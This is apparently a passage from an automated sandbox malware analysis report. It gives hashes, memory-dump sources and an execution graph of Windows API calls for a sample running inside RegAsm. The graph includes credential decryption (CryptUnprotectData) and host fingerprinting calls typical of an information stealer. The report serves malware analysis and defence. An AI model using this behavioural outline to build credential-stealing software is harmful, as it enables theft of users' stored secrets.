          Similarity
          • API ID: FileWrite$ConsoleErrorLastOutput
          • String ID:
          • API String ID: 2718003287-0
          • Opcode ID: f47a95019158fc4f6db2fd89d9e76d3b483dede9b54c8d25a9bf0913b9be8c91
          • Instruction ID: 3c4e3d96d554cd9dd1d3f3cb4f7e935f21a2dbf74083e15bc5cc85f1de3795d0
          • Opcode Fuzzy Hash: f47a95019158fc4f6db2fd89d9e76d3b483dede9b54c8d25a9bf0913b9be8c91
          • Instruction Fuzzy Hash: 9DD179B5E10248DFCB15DFE9D890AADBBB5FF08310F18812AE856E7351D730A946CB60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetEnvironmentStringsW.KERNEL32 ref: 00D979D0
          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D97A08
          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D97A28
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: EnvironmentStrings$Free
          • String ID:
          • API String ID: 3328510275-0
          • Opcode ID: 4e6b78822f682f522f9fbd97120a299153c9f3a3f6e7386ffe286b1d43c50dc0
          • Instruction ID: c0158dc7b6398cff43274c8b19de49ca3bd93ceb506988b75fbf329cda6906e8
          • Opcode Fuzzy Hash: 4e6b78822f682f522f9fbd97120a299153c9f3a3f6e7386ffe286b1d43c50dc0
          • Instruction Fuzzy Hash: FA1126B65192097EBF2167B25C8DCBF696CEF853943140114F50DE1142FA20DF1192B1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00D8F333
          • GetLastError.KERNEL32(?,?,?,?), ref: 00D8F340
          • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 00D8F366
          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00D8F38C
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: FilePointer$ErrorLast
          • String ID:
          • API String ID: 142388799-0
          • Opcode ID: 06acbfde5d7cf09cbc4f6d5b52ec1bd3f3fa6a0a2e20786dbf177518b2a914cc
          • Instruction ID: 1545c473b40a7bcd5984ba6add049b1fcd48ccdf7022b416be3b4192bf209e58
          • Opcode Fuzzy Hash: 06acbfde5d7cf09cbc4f6d5b52ec1bd3f3fa6a0a2e20786dbf177518b2a914cc
          • Instruction Fuzzy Hash: BD114572801119EFCF20AFA6DC0899E7F69EB04760F144254F824A21A0C732AA51DBB0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00DA6567
          • GetLastError.KERNEL32 ref: 00DA6573
          • ___initconout.LIBCMT ref: 00DA6583
            • Part of subcall function 00DA6601: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DA6588), ref: 00DA6614
          • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00DA6597
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: ConsoleWrite$CreateErrorFileLast___initconout
          • String ID:
          • API String ID: 3431868840-0
          • Opcode ID: fd40269df08a94fcd3c6cf9a9168797efd4d0ab4a44503fa823053d4af160826
          • Instruction ID: 2e7384a9dbc3fbc4a957b0c3c77e369e4eca3fcc3daccc0bf2997addce111114
          • Opcode Fuzzy Hash: fd40269df08a94fcd3c6cf9a9168797efd4d0ab4a44503fa823053d4af160826
          • Instruction Fuzzy Hash: F3F0F83A100501BFCB321BD6ED05D4ABFB7FF89761B194429F66D92530CA32E8659B60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00DA6680
          • GetLastError.KERNEL32 ref: 00DA668C
          • ___initconout.LIBCMT ref: 00DA669C
            • Part of subcall function 00DA6601: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DA6588), ref: 00DA6614
          • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00DA66B1
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: ConsoleWrite$CreateErrorFileLast___initconout
          • String ID:
          • API String ID: 3431868840-0
          • Opcode ID: 350b5e1316e838705d912a53d2537ae9ac29a79357b1c00ef1a2c15f77eb1145
          • Instruction ID: 742af9c7927c84d53559d4402d367e4a72257a804947961f097a12b28b0eca85
          • Opcode Fuzzy Hash: 350b5e1316e838705d912a53d2537ae9ac29a79357b1c00ef1a2c15f77eb1145
          • Instruction Fuzzy Hash: 02F0AC36541125FFCF321F96DC0599A7F66FB0A3A1B0D4564FA1CA6131CA32D8259BA0
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          • InitializeCriticalSectionEx, xrefs: 00D8AE06
          • GetXStateFeaturesMask, xrefs: 00D8ADB6
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
          • API String ID: 0-4196971266
          • Opcode ID: 0aca3a6c75699822c0276ae739c2faf9259eecd86020cbe18b98be496b38b8eb
          • Instruction ID: b587a3f1ee2ddd68144cf4aa778004a305af0a87fc6151881e3c3350c73e7cf1
          • Opcode Fuzzy Hash: 0aca3a6c75699822c0276ae739c2faf9259eecd86020cbe18b98be496b38b8eb
          • Instruction Fuzzy Hash: 11018F32680228BBCB213B96DC06EDEBF15DF50BA1F044412FA1929161D6B2982997F1
          Uniqueness

          Uniqueness Score: -1.00%

          Execution Graph

          Execution Coverage:16%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:4.1%
          Total number of Nodes:364
          Total number of Limit Nodes:20
          execution_graph 10178 408e40 10181 408e4b 10178->10181 10179 408e4f 10180 408ea1 ExitProcess 10179->10180 10181->10179 10182 408e5c GetStdHandle ExitProcess 10181->10182 10182->10179 10183 420d42 10184 420d4e 10183->10184 10186 420d60 10183->10186 10188 42103e 10183->10188 10189 420e49 10183->10189 10191 43ac90 10184->10191 10186->10186 10186->10188 10186->10189 10195 43b7d0 10186->10195 10189->10188 10190 435c40 LdrInitializeThunk 10189->10190 10190->10189 10193 43acb0 10191->10193 10192 43adbe 10192->10186 10193->10192 10203 435c40 10193->10203 10197 43b7f0 10195->10197 10196 43b8ce 10200 43b9be 10196->10200 10206 435ab0 10196->10206 10197->10196 10199 435c40 LdrInitializeThunk 10197->10199 10199->10196 10200->10189 10201 43b90d 10201->10200 10202 435c40 LdrInitializeThunk 10201->10202 10202->10200 10204 435c70 10203->10204 10205 435c6d LdrInitializeThunk 10203->10205 10204->10192 10205->10192 10207 435af7 10206->10207 10208 435b45 RtlAllocateHeap 10206->10208 10207->10208 10208->10201 10209 411fc1 10210 411fd6 10209->10210 10215 414720 10210->10215 10212 411ff5 10213 409920 RtlExpandEnvironmentStrings RtlAllocateHeap 10212->10213 10214 411fff 10213->10214 10216 4147f0 10215->10216 10216->10216 10217 4147fb RtlExpandEnvironmentStrings 10216->10217 10218 414816 10217->10218 10219 435ab0 RtlAllocateHeap 10218->10219 10220 414826 RtlExpandEnvironmentStrings 10219->10220 10221 4148a9 10220->10221 10222 435ab0 RtlAllocateHeap 10221->10222 10223 414931 10222->10223 10223->10223 10226 43a420 10223->10226 10225 4149ac 10227 43a440 10226->10227 10228 435ab0 RtlAllocateHeap 10227->10228 10229 43a470 10228->10229 10229->10229 10230 43a5ae 10229->10230 10231 435c40 LdrInitializeThunk 10229->10231 10230->10225 10231->10230 10232 419dc0 10233 419dd4 10232->10233 10235 419e44 10232->10235 10234 435ab0 RtlAllocateHeap 10233->10234 10234->10235 10236 41f5c0 10237 41f5d4 10236->10237 10240 43adf0 10237->10240 10239 41f5f5 10243 43ae32 10240->10243 10241 43aeae 10242 43af9e 10241->10242 10244 435ab0 RtlAllocateHeap 10241->10244 10242->10239 10243->10241 10245 435c40 LdrInitializeThunk 10243->10245 10246 43aeeb 10244->10246 10245->10241 10246->10242 10247 435c40 LdrInitializeThunk 10246->10247 10247->10242 10248 4195c3 10249 4195d8 10248->10249 10250 435ab0 RtlAllocateHeap 10249->10250 10251 4196d7 10250->10251 10252 43a420 2 API calls 10251->10252 10253 41973a 10252->10253 10254 4209c1 10255 4209c0 10254->10255 10257 420930 10254->10257 10255->10254 10256 43ac90 LdrInitializeThunk 10255->10256 10255->10257 10256->10255 10258 413649 10261 413650 10258->10261 10262 41ac80 10261->10262 10265 41adc0 10262->10265 10266 43a420 2 API calls 10265->10266 10267 41ae18 10266->10267 10268 415dc9 10271 417230 10268->10271 10272 4172f9 10271->10272 10273 435ab0 RtlAllocateHeap 10272->10273 10274 4173c1 10273->10274 10275 41444b 10276 435ab0 RtlAllocateHeap 10275->10276 10277 414455 10276->10277 10280 43a8d0 10277->10280 10281 43a912 10280->10281 10282 43a98e 10281->10282 10283 435c40 LdrInitializeThunk 10281->10283 10284 414469 10282->10284 10285 435c40 LdrInitializeThunk 10282->10285 10283->10282 10285->10284 10286 438e4e 10287 438ee4 RtlReAllocateHeap 10286->10287 10288 438e9c 10286->10288 10289 438fa5 10287->10289 10288->10287 10294 416b4f 10299 434040 10294->10299 10296 416b5f 10297 4142e0 RtlAllocateHeap LdrInitializeThunk 10296->10297 10298 416b74 10297->10298 10300 43a420 2 API calls 10299->10300 10301 43407c 10300->10301 10302 437652 10304 437699 10302->10304 10303 4376fe 10304->10303 10305 435c40 LdrInitializeThunk 10304->10305 10305->10303 10306 41fed0 10307 43ac90 LdrInitializeThunk 10306->10307 10308 41fef2 10307->10308 10309 43ac90 LdrInitializeThunk 10308->10309 10310 41ff19 10309->10310 10311 417c53 10312 417c9f 10311->10312 10313 41adc0 2 API calls 10312->10313 10314 417cdf 10313->10314 10315 4229d0 10316 4229e0 10315->10316 10316->10316 10317 435ab0 RtlAllocateHeap 10316->10317 10318 422ae0 10317->10318 10319 43a420 2 API calls 10318->10319 10320 422bad 10319->10320 10325 41545b 10326 415463 10325->10326 10327 435ab0 RtlAllocateHeap 10326->10327 10329 41558e 10327->10329 10328 4156de CryptUnprotectData 10329->10328 10330 414b5c 10331 414b95 10330->10331 10332 435ab0 RtlAllocateHeap 10331->10332 10333 414c3f 10332->10333 10333->10333 10334 43a420 2 API calls 10333->10334 10335 414cb9 10334->10335 10342 41acdf 10343 41ad4b 10342->10343 10343->10343 10344 41adc0 2 API calls 10343->10344 10345 41adaa 10344->10345 10350 421160 10351 420d90 10350->10351 10352 420e49 10350->10352 10354 42103e 10350->10354 10353 43b7d0 2 API calls 10351->10353 10352->10354 10355 435c40 LdrInitializeThunk 10352->10355 10353->10352 10355->10352 10360 4386ea 10361 4386fb RtlAllocateHeap 10360->10361 10363 4387e9 10361->10363 10368 415b6f 10369 435ab0 RtlAllocateHeap 10368->10369 10370 415b7a 10369->10370 10371 43a8d0 LdrInitializeThunk 10370->10371 10372 415b8e 10371->10372 10373 435ab0 RtlAllocateHeap 10372->10373 10374 415ba9 10373->10374 10375 43a8d0 LdrInitializeThunk 10374->10375 10376 415bc2 10375->10376 10377 428ced 10378 428e25 SysAllocString 10377->10378 10379 428ddd 10377->10379 10380 428e97 10378->10380 10379->10378 10381 41c2f0 10382 41c34f 10381->10382 10383 41c2fb 10381->10383 10384 435ab0 RtlAllocateHeap 10383->10384 10385 41c35e 10384->10385 10386 435ab0 RtlAllocateHeap 10385->10386 10387 41c3f0 10386->10387 10387->10387 10388 41ac80 2 API calls 10387->10388 10388->10382 10389 418bf2 10390 418d0d 10389->10390 10403 4142e0 10390->10403 10392 418d83 10393 4142e0 RtlAllocateHeap LdrInitializeThunk 10392->10393 10394 418ece 10393->10394 10395 4142e0 RtlAllocateHeap LdrInitializeThunk 10394->10395 10396 41908c 10395->10396 10397 4142e0 RtlAllocateHeap LdrInitializeThunk 10396->10397 10398 41921a 10397->10398 10399 4142e0 RtlAllocateHeap LdrInitializeThunk 10398->10399 10400 41937f 10399->10400 10401 4142e0 RtlAllocateHeap LdrInitializeThunk 10400->10401 10402 4194e7 10401->10402 10404 414300 10403->10404 10405 435ab0 RtlAllocateHeap 10404->10405 10406 414353 10405->10406 10406->10406 10407 43a420 2 API calls 10406->10407 10408 4143ca 10407->10408 10409 4382f7 10410 4383a0 LoadLibraryW 10409->10410 10411 43836b 10409->10411 10411->10410 10411->10411 10412 42e1f7 10413 42e1fc 10412->10413 10414 42e20d KiUserCallbackDispatcher GetSystemMetrics 10413->10414 10415 42e24c DeleteObject 10414->10415 10417 42e2a2 SelectObject 10415->10417 10419 42e348 SelectObject 10417->10419 10420 42e374 DeleteObject 10419->10420 10422 413777 10425 409920 10422->10425 10424 413781 10426 409971 10425->10426 10427 409935 10425->10427 10426->10424 10431 433d30 10427->10431 10429 4099e5 10430 435ab0 RtlAllocateHeap 10429->10430 10430->10426 10432 433db0 10431->10432 10433 433de9 RtlExpandEnvironmentStrings 10431->10433 10432->10432 10432->10433 10434 41507b 10435 415082 10434->10435 10436 435ab0 RtlAllocateHeap 10435->10436 10437 4150d9 10436->10437 10438 435ab0 RtlAllocateHeap 10437->10438 10439 4151a3 10438->10439 10439->10439 10442 43a5f0 10439->10442 10441 415214 10443 43a610 10442->10443 10444 435ab0 RtlAllocateHeap 10443->10444 10445 43a640 10444->10445 10446 43a77e 10445->10446 10447 435c40 LdrInitializeThunk 10445->10447 10446->10441 10447->10446 10452 4149fb 10453 435ab0 RtlAllocateHeap 10452->10453 10454 414a07 10453->10454 10455 43a8d0 LdrInitializeThunk 10454->10455 10456 414a18 10455->10456 10457 4138fb 10458 413901 10457->10458 10459 409920 2 API calls 10458->10459 10460 413917 10459->10460 10461 42120a 10462 42121a 10461->10462 10463 435ab0 RtlAllocateHeap 10462->10463 10464 421274 10463->10464 10465 415c0c 10466 415c0e 10465->10466 10467 415cae 10466->10467 10468 435c40 LdrInitializeThunk 10466->10468 10468->10467 10469 437a0d 10472 437a7b 10469->10472 10470 437bae 10471 437ade 10471->10470 10474 435c40 LdrInitializeThunk 10471->10474 10472->10471 10473 435c40 LdrInitializeThunk 10472->10473 10473->10471 10474->10470 10484 424397 10485 4243a1 10484->10485 10485->10485 10486 42480e GetComputerNameExA 10485->10486 10487 42486c GetComputerNameExA 10486->10487 10489 42497e 10487->10489 10490 417b94 10491 417b98 10490->10491 10493 417bad 10490->10493 10492 43a5f0 2 API calls 10491->10492 10492->10493 10494 420d1d 10495 43adf0 2 API calls 10494->10495 10496 420d2a 10495->10496 10497 41989e 10498 43a8d0 LdrInitializeThunk 10497->10498 10499 4198b9 10498->10499 10500 4137a2 10501 4137b1 10500->10501 10524 41d140 10501->10524 10503 4137b7 10504 409920 RtlExpandEnvironmentStrings RtlAllocateHeap 10503->10504 10505 4137c1 10504->10505 10506 41da20 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 10505->10506 10507 4137d6 10506->10507 10508 409920 RtlExpandEnvironmentStrings RtlAllocateHeap 10507->10508 10509 4137e0 10508->10509 10510 409920 RtlExpandEnvironmentStrings RtlAllocateHeap 10509->10510 10511 4137ff 10510->10511 10512 421440 RtlAllocateHeap LdrInitializeThunk 10511->10512 10513 41381d 10512->10513 10514 421910 LdrInitializeThunk 10513->10514 10515 413826 10514->10515 10516 409920 RtlExpandEnvironmentStrings RtlAllocateHeap 10515->10516 10517 413830 10516->10517 10518 422450 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 10517->10518 10519 413845 10518->10519 10520 409920 RtlExpandEnvironmentStrings RtlAllocateHeap 10519->10520 10521 41384f 10520->10521 10522 42dbb0 6 API calls 10521->10522 10523 41386d 10522->10523 10525 41d1af 10524->10525 10526 41d1fe RtlExpandEnvironmentStrings 10524->10526 10525->10526 10527 41d243 10526->10527 10528 435ab0 RtlAllocateHeap 10527->10528 10529 41d253 RtlExpandEnvironmentStrings 10528->10529 10530 41d2d1 10529->10530 10531 435ab0 RtlAllocateHeap 10530->10531 10532 41d364 10531->10532 10532->10532 10533 43a5f0 2 API calls 10532->10533 10534 41d3d7 10533->10534 10535 437da5 10536 437e05 10535->10536 10537 437e58 10536->10537 10538 435c40 LdrInitializeThunk 10536->10538 10539 435c40 LdrInitializeThunk 10537->10539 10538->10537 10539->10537 10544 412c32 10549 417ad0 10544->10549 10546 412c60 10547 409920 RtlExpandEnvironmentStrings RtlAllocateHeap 10546->10547 10548 412c6a 10547->10548 10550 417b10 10549->10550 10550->10550 10551 417b1a RtlExpandEnvironmentStrings 10550->10551 10552 417b4b 10551->10552 10553 435ab0 RtlAllocateHeap 10552->10553 10554 417b5b 10553->10554 10555 414632 10556 414675 10555->10556 10557 435c40 LdrInitializeThunk 10556->10557 10558 414706 10557->10558 10559 41b53c 10560 41b54d 10559->10560 10564 41bf50 10560->10564 10580 420580 10560->10580 10561 41b5b6 10565 41bf66 10564->10565 10570 41c020 10564->10570 10566 435ab0 RtlAllocateHeap 10565->10566 10565->10570 10567 41c093 10566->10567 10567->10567 10568 43a420 2 API calls 10567->10568 10569 41c10d 10568->10569 10569->10570 10571 435ab0 RtlAllocateHeap 10569->10571 10570->10561 10572 41c11d 10571->10572 10573 43a8d0 LdrInitializeThunk 10572->10573 10574 41c12f 10573->10574 10575 435ab0 RtlAllocateHeap 10574->10575 10576 41c175 10574->10576 10577 41c18a 10575->10577 10576->10570 10578 435c40 LdrInitializeThunk 10576->10578 10577->10577 10586 408f20 10577->10586 10578->10570 10581 420599 10580->10581 10585 420700 10580->10585 10582 435ab0 RtlAllocateHeap 10581->10582 10583 420714 10582->10583 10583->10583 10584 41ac80 2 API calls 10583->10584 10584->10585 10585->10561 10587 40904a 10586->10587 10589 408f40 10586->10589 10588 435ab0 RtlAllocateHeap 10587->10588 10591 408f8a 10588->10591 10590 435ab0 RtlAllocateHeap 10589->10590 10590->10591 10591->10576 10592 42523f 10593 425246 10592->10593 10593->10593 10594 433d30 RtlExpandEnvironmentStrings 10593->10594 10595 42531a 10594->10595 10596 425365 GetPhysicallyInstalledSystemMemory 10595->10596 10597 42538a 10596->10597 10598 433e3c 10601 439830 10598->10601 10600 433e67 GetVolumeInformationW 10602 4162be 10603 4162f3 10602->10603 10604 4142e0 2 API calls 10603->10604 10605 416346 10604->10605 10606 4142e0 2 API calls 10605->10606 10607 41640d 10606->10607 10608 4142e0 2 API calls 10607->10608 10609 4164c6 10608->10609 10610 4142e0 2 API calls 10609->10610 10611 416579 10610->10611 10612 435ab0 RtlAllocateHeap 10611->10612 10614 41668f 10612->10614 10613 4142e0 RtlAllocateHeap LdrInitializeThunk 10613->10614 10614->10613 10615 435ab0 RtlAllocateHeap 10614->10615 10615->10614

          Control-flow Graph

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
          • String ID:
          • API String ID: 1449868515-3916222277
          • Opcode ID: 6b7cebe50cf6556630275e5f11e15ad1a39a570c298038abc4e11d1214af084e
          • Instruction ID: c7ce9ad7c8caa66f18583b1677d8e9add8b1d673c0d8bba032b5b85bb3361068
          • Opcode Fuzzy Hash: 6b7cebe50cf6556630275e5f11e15ad1a39a570c298038abc4e11d1214af084e
          • Instruction Fuzzy Hash: A1514EB4505B408FC364EF69D585A1ABBF0BB98300F51992DE89AC7B60D734F849CF46
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 104 424394-4243a8 106 4243f6-4243ff 104->106 107 4243aa-4243be 104->107 108 42444b-42444f 106->108 109 4243c0-4243f2 107->109 110 424401 107->110 111 424450-424459 108->111 109->109 113 4243f4 109->113 112 424403-42440a 110->112 111->111 114 42445b-4244ef 111->114 115 424427-424445 112->115 116 42440c-42441c 112->116 113->112 117 4244f1 114->117 118 424548-424551 114->118 119 424447-424449 115->119 120 42441e-424425 115->120 116->119 116->120 121 424500-424546 117->121 122 424553-424559 118->122 123 42456b-424577 118->123 119->108 119->114 120->108 121->118 121->121 124 424560-424569 122->124 125 42458b-424596 123->125 126 424579-42457f 123->126 124->123 124->124 129 4245a1-42464d call 439830 125->129 130 424598-42459e call 4086d0 125->130 127 424580-424589 126->127 127->125 127->127 136 424698-4246a1 129->136 137 42464f 129->137 130->129 139 4246a3-4246a9 136->139 140 4246bb-4246c7 136->140 138 424650-424696 137->138 138->136 138->138 141 4246b0-4246b9 139->141 142 4246db-424709 call 408740 call 439830 140->142 143 4246c9-4246cf 140->143 141->140 141->141 148 42470e-424718 142->148 144 4246d0-4246d9 143->144 144->142 144->144 149 42471b-42477a 148->149 150 4247b5-4247be 149->150 151 42477c-42477f 149->151 153 4247c0-4247c6 150->153 154 4247db-4247e7 150->154 152 424780-4247b3 151->152 152->150 152->152 155 4247d0-4247d9 153->155 156 4247fb-424809 call 439830 154->156 157 4247e9-4247ef 154->157 155->154 155->155 160 42480e-42486a GetComputerNameExA 156->160 158 4247f0-4247f9 157->158 158->156 158->158 161 42486c-42486f 160->161 162 4248bd-4248c6 160->162 165 424870-4248bb 161->165 163 4248db-4248e7 162->163 164 4248c8-4248cf 162->164 167 4248fb-42497c GetComputerNameExA 163->167 168 4248e9-4248ef 163->168 166 4248d0-4248d9 164->166 165->162 165->165 166->163 166->166 170 4249c8-4249d1 167->170 171 42497e-42497f 167->171 169 4248f0-4248f9 168->169 169->167 169->169 173 4249d3-4249d9 170->173 174 4249eb-4249f7 170->174 172 424980-4249c6 171->172 172->170 172->172 175 4249e0-4249e9 173->175 176 424a0b-424a7a 174->176 177 4249f9-4249ff 174->177 175->174 175->175 180 424aa6-424aaf 176->180 181 424a7c-424a7f 176->181 178 424a00-424a09 177->178 178->176 178->178 183 424ab1-424ab7 180->183 184 424acb-424ad7 180->184 182 424a80-424aa4 181->182 182->180 182->182 185 424ac0-424ac9 183->185 186 424aeb-424b54 call 439830 184->186 187 424ad9-424adf 184->187 185->184 185->185 192 424b56 186->192 193 424b8f-424b98 186->193 188 424ae0-424ae9 187->188 188->186 188->188 194 424b60-424b8d 192->194 195 424b9a 193->195 196 424bab-424bb6 193->196 194->193 194->194 197 424ba0-424ba9 195->197 198 424bd9-424be5 196->198 197->196 197->197 199 424c7a-424c7d 198->199 200 